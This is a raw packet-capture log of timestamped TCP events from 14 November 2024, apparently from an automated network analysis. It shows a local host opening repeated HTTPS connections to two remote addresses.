                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.805124998 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.805500984 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.805516958 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.852709055 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.853121042 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.853128910 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.853472948 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.853482008 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.926084042 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.926527977 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.926539898 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.926872015 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.926877022 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933526039 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933654070 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933784962 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933830023 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933844090 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933854103 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.933859110 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.936836004 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.936866999 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.936964989 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.937060118 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.937088013 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.982907057 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.982954025 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.983023882 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.983263016 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.983263016 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.983268023 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.983273983 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.985620975 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.985707998 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.985786915 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.986001968 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.986037016 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054548979 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054621935 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054778099 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054914951 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054934978 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054946899 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.054953098 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.057550907 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.057635069 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.057848930 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.058017969 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.058043957 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.102463961 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.102802038 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.102864027 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.104052067 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.104360104 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.104549885 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.128205061 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.128643036 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.128655910 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.129273891 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.129281044 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.153692007 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.256863117 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.257009983 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.257090092 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.257205009 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.257217884 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.259790897 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.259881973 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.259968996 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.260119915 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.260155916 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.656934023 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.657344103 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.657382011 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.657747984 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.657759905 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.733187914 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.733654976 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.733711958 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.734042883 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.734055996 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.783848047 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.784219027 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.784240961 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.784605026 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.784615040 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785350084 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785454988 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785507917 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785624981 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785624981 CET49696443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785641909 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.785662889 CET4434969613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.788180113 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.788207054 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.788456917 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.788615942 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.788645029 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.910974979 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911231995 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911297083 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911377907 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911377907 CET49698443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911408901 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.911429882 CET4434969813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.914047003 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.914079905 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.914182901 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.914369106 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.914383888 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978255033 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978321075 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978390932 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978516102 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978516102 CET49697443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978558064 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.978584051 CET4434969713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.980683088 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.980773926 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.980864048 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.980987072 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.981023073 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.996766090 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.997098923 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.997121096 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.997534037 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:38.997545958 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.126724005 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.126890898 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.126986980 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.127260923 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.127310991 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.127367020 CET49699443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.127382040 CET4434969913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.130393028 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.130428076 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.130541086 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.130709887 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.130731106 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.293204069 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.294040918 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.294106007 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.294831991 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.294847012 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425228119 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425393105 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425561905 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425729036 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425770044 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425807953 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.425825119 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.430169106 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.430202007 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.430268049 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.430598974 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.430613995 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.519032955 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.519764900 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.519828081 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.520344019 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.520359993 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.649240971 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.650598049 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.650670052 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.650710106 CET49700443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.650723934 CET4434970013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.654416084 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.654798031 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.654822111 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.655180931 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.655200005 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.655225039 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.655925035 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.655930996 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.656124115 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.656140089 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.708690882 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.710103035 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.710165977 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.710624933 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.710639000 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.824165106 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.824258089 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.824368954 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.824759007 CET49701443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.824764967 CET4434970113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.830885887 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.830915928 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.830979109 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.831208944 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.831224918 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838205099 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838321924 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838548899 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838689089 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838726997 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838759899 CET49702443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.838776112 CET4434970213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.842103958 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.842123032 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.842183113 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.842364073 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.842377901 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.866017103 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.866499901 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.866516113 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.867501974 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.867506981 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.991872072 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.991964102 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.992109060 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.992172956 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.992172956 CET49703443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.992186069 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.992192984 CET4434970313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.994916916 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.995003939 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.995150089 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.995270014 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:39.995307922 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.177768946 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.178316116 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.178342104 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.178653002 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.178659916 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.499747038 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.499906063 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.500113010 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.500370979 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.500421047 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.500452995 CET49704443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.500468969 CET4434970413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.501580954 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.504154921 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.504178047 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.505244970 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.505249023 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.508763075 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.508807898 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.508873940 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.509120941 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.509136915 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.631927967 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.632286072 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.632334948 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.632891893 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.633012056 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.647798061 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.647809029 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.647825956 CET49705443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.647830009 CET4434970513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.651540995 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.651603937 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.651937008 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.651951075 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.652410984 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.652419090 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.653570890 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.653575897 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.662981987 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.663072109 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.663156033 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.663481951 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.663521051 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.745896101 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.747360945 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.747426033 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.748137951 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.748159885 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.778220892 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.778300047 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.778383970 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.785830975 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.785831928 CET49706443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.785857916 CET4434970613.107.246.45192.168.2.4
